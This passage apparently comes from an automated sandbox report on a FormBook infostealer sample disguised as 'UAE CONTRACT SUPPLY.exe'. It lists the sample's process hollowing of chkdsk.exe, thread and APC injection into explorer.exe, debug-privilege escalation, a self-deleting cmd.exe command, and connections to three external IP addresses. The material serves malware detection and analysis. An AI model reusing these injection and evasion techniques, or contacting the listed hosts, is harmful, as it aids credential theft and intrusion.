Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]		16_2_05737016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]		16_2_05737016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05737016 mov eax, dword ptr fs:[00000030h]		16_2_05737016
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]		16_2_05784015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05784015 mov eax, dword ptr fs:[00000030h]		16_2_05784015
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B58EC mov eax, dword ptr fs:[00000030h]		16_2_056B58EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]		16_2_056B40E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]		16_2_056B40E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B40E1 mov eax, dword ptr fs:[00000030h]		16_2_056B40E1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		16_2_0574B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574B8D0 mov ecx, dword ptr fs:[00000030h]		16_2_0574B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		16_2_0574B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		16_2_0574B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		16_2_0574B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0574B8D0 mov eax, dword ptr fs:[00000030h]		16_2_0574B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056F90AF mov eax, dword ptr fs:[00000030h]		16_2_056F90AF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E20A0 mov eax, dword ptr fs:[00000030h]		16_2_056E20A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EF0BF mov ecx, dword ptr fs:[00000030h]		16_2_056EF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h]		16_2_056EF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056EF0BF mov eax, dword ptr fs:[00000030h]		16_2_056EF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056B9080 mov eax, dword ptr fs:[00000030h]		16_2_056B9080
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05733884 mov eax, dword ptr fs:[00000030h]		16_2_05733884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05733884 mov eax, dword ptr fs:[00000030h]		16_2_05733884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056BDB60 mov ecx, dword ptr fs:[00000030h]		16_2_056BDB60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h]		16_2_056E3B7A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_056E3B7A mov eax, dword ptr fs:[00000030h]		16_2_056E3B7A

Enables debug privileges

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.230.60.102 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.32.11 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3440			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1340000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Process created: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 0000000D.00000000.479118102.0000000000EE0000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.634131139.0000000007AB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe

Code function: 1_2_02264A17 cpuid

1_2_02264A17

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: chkdsk.exe PID: 392, type: MEMORY
Source: Yara match	File source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY